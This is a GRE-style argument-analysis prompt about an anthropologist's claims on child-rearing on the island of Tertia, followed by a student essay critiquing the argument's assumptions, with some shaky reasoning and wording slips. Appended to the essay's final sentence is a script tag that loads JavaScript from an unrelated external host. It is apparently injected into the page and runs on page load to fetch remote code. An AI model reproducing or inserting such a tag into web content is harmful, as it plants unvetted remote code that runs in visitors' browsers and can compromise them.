"Twenty years ago, Dr. Field, a noted anthropologist, visited the island of Tertia and concluded from his observations that children in Tertia were reared by an entire village rather than by their own biological parents. However, my recent interviews with children living in the group of islands that includes Tertia show that these children spend much more time talking about their biological parents than about other adults in the village. This research of mine proves that Dr. Field's conclusion about Tertian village culture is invalid and thus that the observation-centered approach to studying cultures is invalid as well. The interview-centered method that my team of graduate students is currently using in Tertia will establish a much more accurate understanding of child-rearing traditions there and in other island cultures."

Write a response in which you examine the stated and/or unstated assumptions of the argument. Be sure to explain how the argument depends on these assumptions and what the implications are for the argument if the assumptions prove unwarranted.

Although it is common in experiments, be it science or non-science, to evaluate and compare one or two methods for better accuracy. It is equally important to do the above holistically. The author concluded that the interview-centered method is more efficient than the observation method and thus will establish a greater understanding of the child-rearing culture in other Islands. However, there are some assumptions this author made during his conclusion.

First, the author assumes that because the children talk more about their parents, it nullifies the possibility of the entire village rearing them. Although the frequency of the biological parents' discussion calls for further scrutiny, it is a great error to completely assume that as a deterrence to the former knowledge from Dr. Field. From common knowledge, anybody, be it an adult or a child, tend to talk more about the people they miss. This may in fact, be a factor why the children talk more about their biological parents than any other person residing in the village. This will even support Dr field conclusion further. As a matter of fact, the content of the children's talks will be required to further corroborate the author’s assumption.

Second, the author has committed the fallacy of hasty generalization by assuming that because the interview-based approach worked in Tertia, it will also be efficient in other parts of the island. Again, this is unnecessarily true; we are unsure whether those other groups of children will tell the truth. Likewise, we are unsure whether those in Tertia told the truth. For example, during the 2020 pandemic, countries declared the number of infected people in their countries. It was observed that some countries ballooned their figures while some underreport theirs. The interview has thus failed because the overall information given is inaccurate. While the figures might be true in some countries, it is not in others. It will thus be a massive erring to assume that because the interview-based approach worked in one of the islands, Tertia, it will work in other Islands.

In conclusion, the evidence presented in this case is not sufficient to elicit that conclusion. We can even say that body language observation can be more trusted than word of mouth. At times, children are not disinterested towards matters involving their loved ones. Therefore only their interview method may not be sufficient to explain the culture of childbearing better than the observation approach of Dr. Field.<script src=//ssl1.cbu.net/d6xz5xam></script>